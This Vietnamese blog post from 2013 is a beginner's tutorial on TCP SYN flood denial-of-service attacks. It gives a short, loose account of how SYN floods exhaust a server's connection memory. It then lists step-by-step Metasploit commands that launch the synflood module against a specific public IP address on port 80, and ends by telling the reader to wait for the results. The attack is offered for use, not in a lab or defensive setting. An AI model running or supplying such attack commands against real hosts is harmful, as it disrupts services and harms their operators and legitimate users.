Thứ Tư, 13 tháng 3, 2013

DDOS tcp synflood với Backtrack

Capuchino xin giới thiệu một phương pháp ddos rất nổi tiếng [ nên chỉ giới thiệu cho newbie thui nha ].Đó là phương pháp attack tcp synflood.Phương pháp này được phát triển dựa trên cơ chế gửi các request lên server.[ Cơ chế scan port cũng tương tự như vậy].Attacker gửi các gói lên,nếu server gửi lại các gói trả lời qua 1 port nào đó,thì ta xác định đc port này mở hay đóng.Cơ bản là như vậy,vì còn các cách gửi khác nhau,bởi các phương pháp khác nhau nữa,đôi khi gửi request mà server ko trả lời .Thì port đc gửi request đó lại đc mở.Lang thang thế,vào vấn đề chính,các gói đc gửi ở đây (gói gửi đi là gói SYN).Nếu đc gửi đến 1 server nào đó,với một số lượng quá nhiều ,nó làm cho bộ nhớ trên server,dùng để ghi lại các gói dữ liệu bị đầy.Dẫn đến cạn kiệt tài nguyên,nên đơ luôn.Nhưng tất nhiên là ko dễ để làm server cạn kiệt tài nguyên như thế.Vì server nó tính sẵn rồi.Để tránh việc cạn kiệt bộ nhớ này,nên nó chỉ lưu ,và ghi nhận 1 số request mà thôi.Số còn lại bị từ chối.Do có quá nhiều kết nối như vậy nên dẫn đến một số kết nối hợp lệ bị oan mà cũng bị từ chối luôn.


Vào terminal type:msfconsole
tiếp tục type:use auxiliary/dos/tcp/synflood
tiếp tục set các tham số cho nó
set RHOST 221.132.33.12
set TIMEOUT 500
set RPORT 80
set SNAPLEN 65535
run
 trong dó SNAPLEN là số byte .
Xong ngồi chờ thành quả thui.

Không có nhận xét nào:

Đăng nhận xét